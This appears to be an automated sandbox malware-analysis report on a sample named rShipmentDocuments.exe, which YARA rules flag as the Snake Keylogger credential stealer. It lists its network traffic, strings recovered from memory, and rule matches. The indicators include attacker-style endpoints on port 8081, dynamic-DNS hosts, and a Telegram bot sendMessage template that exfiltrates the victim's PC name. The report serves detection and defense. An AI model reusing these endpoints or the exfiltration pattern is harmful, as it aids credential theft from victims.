Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 11 Oct 2024 07:35:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 11 Oct 2024 07:35:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000031E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: ZOlmYtPdlO.exe, 00000010.00000002.4153230560.00000000068E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft.c62
Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1765638038.0000000002867000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000000.00000002.1732739844.0000000005DA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003220000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enp
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003256000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003251000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/p
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
